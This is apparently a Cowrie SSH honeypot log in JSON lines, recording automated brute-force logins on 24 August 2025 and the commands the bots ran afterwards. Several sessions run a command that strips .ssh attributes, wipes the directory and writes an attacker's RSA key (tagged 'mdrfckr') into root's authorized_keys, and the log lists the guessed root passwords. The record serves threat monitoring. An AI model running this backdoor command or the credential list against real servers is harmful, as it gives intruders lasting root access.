{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":53198,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd88156b69ce","protocol":"ssh","message":"New connection: 129.226.183.73:53198 (1.2.3.4:22) [session: bd88156b69ce]","sensor":"my-vps","timestamp":"2025-08-24T20:52:54.574916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:52:54.582686Z","src_ip":"129.226.183.73","session":"bd88156b69ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:52:54.836163Z","src_ip":"129.226.183.73","session":"bd88156b69ce"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:52:55.857789Z","src_ip":"129.226.183.73","session":"bd88156b69ce"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:52:56.113352Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:52:56.114399Z","src_ip":"129.226.183.73","session":"bd88156b69ce"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":46406,"dst_ip":"1.2.3.4","dst_port":22,"session":"870e95c9662a","protocol":"ssh","message":"New connection: 60.221.239.232:46406 (1.2.3.4:22) [session: 870e95c9662a]","sensor":"my-vps","timestamp":"2025-08-24T20:53:59.017600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:53:59.020235Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:53:59.170822Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.login.success","username":"root","password":"bl.123456","message":"login attempt [root/bl.123456] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:53:59.779096Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:54:00.100161Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:54:00.100879Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:54:00.101973Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:54:00.254989Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:54:00.648421Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T20:54:00.649193Z","src_ip":"60.221.239.232","session":"870e95c9662a"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":48736,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3e0c9ff24e1","protocol":"ssh","message":"New connection: 60.221.239.232:48736 (1.2.3.4:22) [session: a3e0c9ff24e1]","sensor":"my-vps","timestamp":"2025-08-24T20:54:06.846855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:54:06.847520Z","src_ip":"60.221.239.232","session":"a3e0c9ff24e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:54:07.062444Z","src_ip":"60.221.239.232","session":"a3e0c9ff24e1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T20:54:07.960474Z","src_ip":"60.221.239.232","session":"a3e0c9ff24e1"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":48028,"dst_ip":"1.2.3.4","dst_port":22,"session":"be7edeb38be1","protocol":"ssh","message":"New connection: 129.226.183.73:48028 (1.2.3.4:22) [session: be7edeb38be1]","sensor":"my-vps","timestamp":"2025-08-24T20:54:10.314043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:54:10.314949Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:54:10.591025Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.login.success","username":"root","password":"Password#123","message":"login attempt [root/Password#123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:54:11.712716Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:54:12.303526Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:54:12.304229Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:54:12.305053Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:54:12.583484Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:54:13.147171Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T20:54:13.147858Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T20:54:13.417320Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:54:13.418113Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":49524,"dst_ip":"1.2.3.4","dst_port":22,"session":"147cbc41f2c4","protocol":"ssh","message":"New connection: 129.226.183.73:49524 (1.2.3.4:22) [session: 147cbc41f2c4]","sensor":"my-vps","timestamp":"2025-08-24T20:54:13.671033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:54:13.672999Z","src_ip":"129.226.183.73","session":"147cbc41f2c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:54:13.927936Z","src_ip":"129.226.183.73","session":"147cbc41f2c4"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:54:13.967005Z","src_ip":"60.221.239.232","session":"a3e0c9ff24e1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T20:54:14.964261Z","src_ip":"129.226.183.73","session":"147cbc41f2c4"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:54:16.230467Z","src_ip":"129.226.183.73","session":"147cbc41f2c4"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":50660,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3aad238d84b","protocol":"ssh","message":"New connection: 129.226.183.73:50660 (1.2.3.4:22) [session: e3aad238d84b]","sensor":"my-vps","timestamp":"2025-08-24T20:54:16.496632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:54:16.501768Z","src_ip":"129.226.183.73","session":"e3aad238d84b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:54:16.765828Z","src_ip":"129.226.183.73","session":"e3aad238d84b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:54:17.808475Z","src_ip":"129.226.183.73","session":"e3aad238d84b"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:54:18.065981Z","src_ip":"129.226.183.73","session":"be7edeb38be1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:54:18.071951Z","src_ip":"129.226.183.73","session":"e3aad238d84b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52504,"dst_ip":"1.2.3.4","dst_port":22,"session":"1845d4f78813","protocol":"ssh","message":"New connection: 217.72.205.35:52504 (1.2.3.4:22) [session: 1845d4f78813]","sensor":"my-vps","timestamp":"2025-08-24T20:54:58.426813Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:54:58.427875Z","src_ip":"217.72.205.35","session":"1845d4f78813"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":45220,"dst_ip":"1.2.3.4","dst_port":22,"session":"74dd22f26347","protocol":"ssh","message":"New connection: 129.226.183.73:45220 (1.2.3.4:22) [session: 74dd22f26347]","sensor":"my-vps","timestamp":"2025-08-24T20:55:22.986984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:55:22.988297Z","src_ip":"129.226.183.73","session":"74dd22f26347"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:55:23.258074Z","src_ip":"129.226.183.73","session":"74dd22f26347"}
{"eventid":"cowrie.login.failed","username":"steam","password":"a","message":"login attempt [steam/a] failed","sensor":"my-vps","timestamp":"2025-08-24T20:55:24.329492Z","src_ip":"129.226.183.73","session":"74dd22f26347"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:55:25.601454Z","src_ip":"129.226.183.73","session":"74dd22f26347"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":44442,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d3b37a2d754","protocol":"ssh","message":"New connection: 45.88.8.186:44442 (1.2.3.4:22) [session: 6d3b37a2d754]","sensor":"my-vps","timestamp":"2025-08-24T20:56:26.266812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:56:26.760242Z","src_ip":"45.88.8.186","session":"6d3b37a2d754"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@